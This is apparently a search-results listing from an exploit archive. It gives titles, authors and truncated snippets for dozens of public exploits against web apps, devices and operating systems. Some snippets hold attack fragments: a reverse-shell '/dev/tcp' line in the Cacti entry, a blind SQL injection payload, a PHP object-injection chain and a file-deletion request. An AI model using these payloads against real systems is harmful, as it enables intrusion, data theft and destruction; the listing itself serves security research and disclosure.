39001 matches found
MiniWeb HTTP Server 0.8.1 Denial Of Service Exploit
!/usr/bin/perl use IO::Socket; Exploit Title: MiniWeb HTTP Server 0.8.1 - Denied of Service DoS Discovery by: Fernando Mengali Discovery Date: 19 january 2024 Vendor Homepage: N/A Download to demo: https://drive.google.com/file/d/1AVHSlsYj5Ukw9co9M2Ql6RsqCTzbI038/view?usp=sharing Notification...
projectSend r1605 - Private file download Vulnerability
Exploit Title: projectSend r1605 - Private file download Application: projectSend Version: r1605 Bugs: IDOR Technology: PHP Vendor URL: https://www.projectsend.org/ Software Link: https://www.projectsend.org/ Date of found: 24-01-2023 Author: Mirabbas Ağalarov Tested on: Linux Technical Details &...
Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset Vulnerability
Exploit Title: Sielco PolyEco Digital FM Transmitter 2.0.6 - Authorization Bypass Factory Reset Exploit Author: LiquidWorm Vendor: Sielco S.r.l Product web page: https://www.sielco.org Affected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3...
Music Gallery Site v1.0 - SQL Injection Vulnerability (3)
Exploit Title: Music Gallery Site v1.0 - SQL Injection on page Master.php Exploit Author: Muhammad Navaid Zafar Ansari CVE Assigned: CVE-2023-0962 mitre.org nvd.nist.org Vendor Homepage: https://www.sourcecodester.com Software Link: Music Gallery Site Version: v 1.0 Tested on: Windows 11 SQL...
Tiki Wiki CMS Groupware 24.0 grid.php PHP Object Injection Vulnerability
----------------------------------------------------------------------------- Tiki Wiki CMS Groupware const popChain = 'O:25:"SearchElasticConnection":1:S:31:"\00SearchElasticConnection\00bulk";O:28:"SearchElasticBulkOper...
Owlfiles File Manager 12.0.1 Path Traversal / Local File Inclusion Vulnerabilities
Exploit Title: Owlfiles File Manager 12.0.1 - multi vulnerabilities Exploit Author: Chokri Hammedi Vendor Homepage: https://www.skyjos.com/ Software Link: https://apps.apple.com/us/app/owlfiles-file-manager/id510282524 Version: 12.0.1 Tested on: Ios 16.0 path traversal on HTTP built-in server GET...
WordPress Netroics Blog Posts Grid 1.0 Plugin - Stored XSS Vulnerability
Exploit Title: WordPress Plugin Netroics Blog Posts Grid 1.0 - Stored Cross-Site Scripting XSS Exploit Author: saitamang, syad, yunaranyancat Vendor Homepage: wordpress.org Software Link: https://downloads.wordpress.org/plugin/netroics-blog-posts-grid.zip Version: 1.0 Tested on: Centos 7 apache2 ...
Real Player v.20.0.8.310 G2 Control - DoGoToURL() Remote Code Execution Exploit
Exploit Title: Real Player v.20.0.8.310 G2 Control - 'DoGoToURL' Remote Code Execution RCE Exploit Author: Eduardo Braun Prado Vendor Homepage: http://real.com/ Software Link: http://real.com/ Version: v.20.0.8.310 Tested on: Windows 7, 8.1, 10 CVE : N/A Full PoC:...
Marval MSM v14.19.0.12476 - Remote Code Execution (Authenticated) Vulnerability
Exploit Title: Marval MSM v14.19.0.12476 - Remote Code Execution RCE Authenticated Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://www.marvalnorthamerica.com/ Software Link: https://www.marvalnorthamerica.com/ Version: v14.19.0.12476 Tested on: Windows Detailed blog:...
PostgreSQL 9.3-11.7 - Remote Code Execution (Authenticated) Exploit
Exploit Title: PostgreSQL 9.3-11.7 - Remote Code Execution RCE Authenticated Exploit Author: b4keSn4ke Github: https://github.com/b4keSn4ke Vendor Homepage: https://www.postgresql.org/ Software Link: https://www.postgresql.org/download/linux/debian/ Version: 9.3 - 11.7 Tested on: Linux x86-64 -...
OwnCloud 8.1.8 - Username Disclosure Vulnerability
Exploit for php platform in category web applications Exploit Title: OwnCloud 8.1.8 - Username Disclosure Exploit Author : Daniel Moreno Vendor Homepage : https://owncloud.org/ Link Software : https://ftp.icm.edu.pl/packages/owncloud/ old version. Download at your own risk Tested on OS: CentOS Po...
SuperDoctor5 - (NRPE) Remote Code Execution Exploit
SuperMicro implemented a Remote Command Execution plugin in their implementation of NRPE in SuperDocter 5, which is their monitoring utility for SuperMicro chassis'. This is an intended feature but leaves the system open by default to unauthenticated remote command execution by abusing the...
McAfee True Key - McAfee.TrueKey.Service Privilege Escalation Vulnerability
Exploit for windows platform in category local exploits McAfee True Key: Multiple Issues with McAfee.TrueKey.Service Implementation Platform: Version 5.1.173.1 on Windows 10 1809. Class: Elevation of Privilege Summary: There are multiple issues in the implementation of the McAfee.TrueKey.Service...
Precurio Intranet Portal 2.0 - Cross-Site Request Forgery (Add Admin) Vulnerability
Exploit for php platform in category web applications Exploit Title: Precurio Intranet Portal 2.0 - Cross-Site Request Forgery Add Admin Exploit Author: Ihsan Sencan Vendor Homepage: http://www.precurio.org Software Link:...
Linux Kernel 4.4.x (Ubuntu 16.04) - 'double-fdput()' in bpf(BPF_PROG_LOAD) Privilege Esc
Exploit for linux platform in category local exploits Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808 In Linux =4.4, when the CONFIGBPFSYSCALL config option is set and the kernel.unprivilegedbpfdisabled sysctl is not explicitly set to 1 at runtime, unprivileged code can use...
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass Vulnerability
Elber Signum DVB-S/S2 IRD for Radio Networks version 1.999 suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the setpwd endpoint that enables th...
LimeSurvey Community 5.3.32 - Stored XSS Vulnerability
Exploit Title: Stored Cross-Site Scripting XSS in LimeSurvey Community Edition Version 5.3.32+220817 Exploit Author: Subhankar Singh Vendor: LimeSurvey Software Link: https://community.limesurvey.org/releases/ Version: LimeSurvey Community Edition Version 5.3.32+220817 Tested on: Windows Client...
WordPress Bricks Builder Theme 1.9.6 Remote Code Execution Exploit
This Metasploit module exploits an unauthenticated remote code execution vulnerability in the Bricks Builder Theme versions 1.9.6 and below for WordPress. The vulnerability allows attackers to execute arbitrary PHP code by leveraging a nonce leakage to bypass authentication and exploit the eval...
TP-Link TL-WR740N - Authenticated Directory Transversal Vulnerability
Exploit Title: TP-Link TL-WR740N - Authenticated Directory Transversal Exploit Author: Anish Feroz Zeroxinn Vendor Homepage: http://www.tp-link.com Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n Tested on: TP-Link TL-WR740N ---------------------------POC---------------------------...
XAMPP 8.2.4 - Unquoted Path Vulnerability
Exploit Title: XAMPP 8.2.4 - Unquoted Path Exploit Author: Andrey Stoykov Version: 8.2.4 Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.2.4/xampp-windows-x64-8.2.4-0-VS16-installer.exe Tested on: Windows Server 2022 Blog: http://msecureltd.blogspot.com/ Steps to...
Rukovoditel 3.3.1 - CSV injection Vulnerability
Exploit Title: Rukovoditel 3.3.1 - CSV injection Version: 3.3.1 Bugs: CSV Injection Technology: PHP Vendor URL: https://www.rukovoditel.net/ Software Link: https://www.rukovoditel.net/download.php Date of found: 27-05-2023 Author: Mirabbas Ağalarov Tested on: Linux 2. Technical Details & POC...
ZKSecurity BIO 4.1.2 SQL Injection / Code Execution Vulnerabilities
ADVISORY INFORMATION Product: ZKSecurity BIO Vendor: ZKTeco https://www.zkteco.com/en/ZKBiosecurity/ZKBioSecurityV50004.1.2 Version Affected: 4.1.2 CVE: CVE-2022-36635 Vulnerability: SQL Injection with a plus: RCE CREDIT This vulnerability was discovered and researched by Caio Burgardt and Silton...
Ingredient Stock Management System 1.0 SQL Injection Vulnerability
Exploit Title: Ingredient Stock Management System v1.0 - 'id' Blind SQL Injection Exploit Author: Saud Alenazi Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15364/ingredients-stock-management-system-phpoop-free-source-code.html Version: 1.0...
Fuel CMS 1.5.0 - Cross-Site Request Forgery Vulnerability
Exploit Title: Fuel CMS 1.5.0 - Cross-Site Request Forgery CSRF Google Dork: NA Exploit Author: Ali J Vendor Homepage: https://www.getfuelcms.com/ Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.5.0 Version: 1.5.0 Tested on: Windows 10 Steps to Reproduce: 1. Login with us...
WebHMI 4.1.1 Remote Code Execution Exploit
Exploit Title: WebHMI 4.1.1 - Remote Code Execution RCE Authenticated Exploit Author: Antonio Cuomo arkantolo Vendor Homepage: https://webhmi.com.ua/en/ Version: WebHMI 4.1.1.7662 Tested on: WebHMI-4.1.1.7662 !/usr/bin/python import sys import re import argparse import requests import time import...
ServiceNow - Username Enumeration Exploit
Exploit Title: ServiceNow - Username Enumeration Exploit Author: Victor Hanna Trustwave SpiderLabs Author Github Page: https://9lyph.github.io/CVE-2021-45901/ Vendor Homepage: https://www.servicenow.com/ Software Link:...
WordPress Social Warfare 3.5.2 Remote Code Execution Exploit
WordPress Social Warfare plugin version 3.5.2 remote code execution exploit. This fully automated exploit is a variation of the original discovery made by Luka Sikic and hash3liZer in May of 2019. Author = Raed Ahsan Vulnerability : SocialWarfare 3.5.2 plugin wordpress Remote Code Execution...
elaniin CMS - Authentication Bypass Vulnerability
Exploit for php platform in category web applications Exploit Title: elaniin CMS 1.0 - Authentication Bypass Exploit Author: BKpatron Vendor Homepage:https://elaniin.com/ Software Link:https://github.com/elaniin/CMS/archive/master.zip Version: v1.0 Tested on: Win 10 CVE: N/A Vulnerability: Attack...
Directory Management System (DMS) 1.0 SQL Injection Vulnerability
Directory Management System DMS version 1.0 suffers from multiple remote SQL Injection vulnerabilities, one of which allows for authentication bypass. Exploit Title: Directory Management System DMS 1.0 - Authentication Bypass Exploit Author: gh1mau Team Members: Capt'N,muzzo,chaos689 |...
Webtareas 2.1 / 2.1p File Upload / Information Disclosure Vulnerabilities
Exploit for php platform in category web applications Authenticated File Upload vulnerability Author: AppleBois Homepage: https://sourceforge.net/projects/webtareas/ Affected Version: 2.1 && 2.1p Vendors Claim there's a patch on 2.1p but it's vulnerable and been few weeks without response. ".exe"...
Microsoft Windows 10 (17763.379) - Install DLL Exploit
Exploit for windows platform in category local exploits edit: Figure out how this works for yourself. I can't be bothered. It's a really hard race, doubt anyone will be able to repro anyway. Could be used with malware, you could programmatically trigger the rollback. Maybe you can even pass the...
Galaxy Forces MMORPG 0.5.8 - type SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Galaxy Forces MMORPG 0.5.8 - 'type' SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://galaxy.alyx.pl/ Software Link: https://excellmedia.dl.sourceforge.net/project/galaxyforces/galaxy/0.5.8/galaxy-0.5.8.7z...
2-Plan Team 1.0.4 - Arbitrary File Upload Vulnerability
Exploit for php platform in category web applications Exploit Title: 2-Plan Team 1.0.4 - Arbitrary File Upload Exploit Author: Ihsan Sencan Vendor Homepage: http://2-plan.com/ Software Link: https://datapacket.dl.sourceforge.net/project/to-plan-team/1.1.0/2-plan-team.tgz Version: 1.0.4 Category:...
Gumbo CMS 0.99 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Gumbo CMS 0.99 - SQL Injection Exploit Author: Ihsan Sencan Vendor Homepage: http://gumbo-cms.net/ Software Link: https://netix.dl.sourceforge.net/project/gumbo-cms/0.99%20beta/gumbo-0.99beta.zip Version: 0.99 Category: Webapps...
Solarwinds LEM 6.3.1 Hardcoded Credentials Vulnerability
The Postgres database on Solarwinds Log and Event Manager Virtual Appliance version 6.3.1 has default hardcoded credentials. While some security measures were taken to ensure that network connectivity to the Postgres database wouldn't be possible using IPv4, the same measures were not taken for...
TVT TD-2308SS-B DVR - Directory Traversal Vulnerability
TVT TD-2308SS-B DVR and possibly other models running firmware version 3.2.0.P-3520A-00 contain a directory traversal vulnerability. An attacker can use directory traversal to download critical files such as the config.dat file for the device which contains the credentials for the web interface...
A-PDF All to MP3 Converter 2.0.0 - DEP Bypass via HeapCreate + HeapAlloc Exploit
!/usr/bin/python Exploit Title: A-PDF All to MP3 Converter 2.0.0 - DEP Bypass with HeapCreate + HeapAlloc + somememorycopyfunction ROP chain Date: 16 November 2023 Exploit Author: George Washington Vendor Homepage: http://www.a-pdf.com/all-to-mp3/download.htm Software Link:...
R Radio Network FM Transmitter 1.07 system.cgi Password Disclosure Vulnerability
R Radio Network FM Transmitter version 1.07 suffers from an improper access control that allows an unauthenticated actor to directly reference the system.cgi endpoint and disclose the clear-text password of the admin user allowing authentication bypass and FM station setup access. R Radio Network...
Equipment Rental Script 1.0 SQL Injection Vulnerability
Title: Equipment Rental Script-1.0 - SQLi Author: nu11secur1ty Vendor: https://www.phpjabbers.com/ Software: https://www.phpjabbers.com/equipment-rental-script/sectionDemo Reference: https://portswigger.net/web-security/sql-injection Description: The packageid parameter appears to be vulnerable t...
WordPress Forminator 1.24.6 Plugin - Unauthenticated Remote Command Execution Vulnerability
Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution Exploit Author: Mehmet Kelepçe Vendor Homepage: https://wpmudev.com/project/forminator-pro/ Software Link: https://wordpress.org/plugins/forminator/ Version: 1.24.6 Tested on: PHP - Mysql - Apache2 -...
Online Diagnostic Lab Management 1.0 SQL Injection Vulnerability
Title: Online-Diagnostic-Lab-Management v1.0 Multiple-SQLi Author: nu11secur1ty Vendor: https://www.youtube.com/watch?v=0nA5xfQ5G0g Vendor: https://www.youtube.com/@MayuriK Software:...
Pluck v4.7.18 - Remote Code Execution Exploit
Exploit Title: Pluck v4.7.18 - Remote Code Execution RCE Application: pluck Version: 4.7.18 Bugs: RCE Technology: PHP Vendor URL: https://github.com/pluck-cms/pluck Software Link: https://github.com/pluck-cms/pluck Date of found: 10-07-2023 Author: Mirabbas Ağalarov Tested on: Linux import reques...
New MVC Shop 1.0 SQL Injection / Missing Attributes Vulnerability
Title: new-mvc-shop-1.0 - SQLi + SameSite attribute weak security PHPSESSID Hijacking Author: nu11secur1ty Vendor: https://chikoiquan.tanhongit.com/ Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0 Reference: https://portswigger.net/web-security/sql-injection Description: The...
Cacti v1.2.22 - Remote Command Execution Exploit
Exploit Title: Cacti v1.2.22 - Remote Command Execution RCE Exploit Author: Riadh BOUCHAHOUA Vendor Homepage: https://www.cacti.net/ Software Links : https://github.com/Cacti/cacti Tested Version: 1.2.2x /dev/tcp/self.rshost/self.rsport &1'" import base64 b64revshell =...
WordPress NEX-Forms plugin < 7.9.7 - Authenticated SQL injection Vulnerability
Exploit Title: NEX-Forms WordPress plugin =3D 5.0.12 AND time-based blind query SLEEP Payload: page=3Dnex-forms-dashboard&formid=3D1 AND SELECT 4715 FROM SELECTSLEEP5nPUi...
Delta Electronics DVW-W02W2-E2 2.42 Command Injection Vulnerability
Delta Electronics DVW-W02W2-E2 version 2.42 suffers from an authenticated command injection vulnerability. ------------------------------------------------------------------------------- title| Authenticated Command Injection product| Delta Electronics DVW-W02W2-E2 vulnerable version| V2.42 fixed...
Joomla Solidres 2.12.9 Cross Site Scripting Vulnerability
┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ Exploits ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : extensions.joomla.org │ │ Vendor : Solidres Team │ │ Software :...
Telesquare TLR-2855KS6 - Arbitrary File Deletion Vulnerability
Exploit Title: Telesquare TLR-2855KS6 - Arbitrary File Deletion Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: http://www.telesquare.co.kr/ Version: TLR-2855KS6 Tested on: Linux Firefox CVE : CVE-2021-46419 Proof of Concept DELETE /cgi-bin/test.cgi HTTP/1.1 Host: 192.168.1.5...
Simple Mobile Comparison Website v1.0 - SQL injection Vulnerability
Title: Simple Mobile Comparison Website v1.0 - SQLi Author: nu11secur1ty Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15186/simple-mobile-comparison-website-phpoop-free-source-code.html Reference:...
Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) Exploit
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule "Strapi CMS 3.0.0-beta.17.4 - Set Password Unauthenticated Metasploit", 'Description' = %q This exploit module abuses the...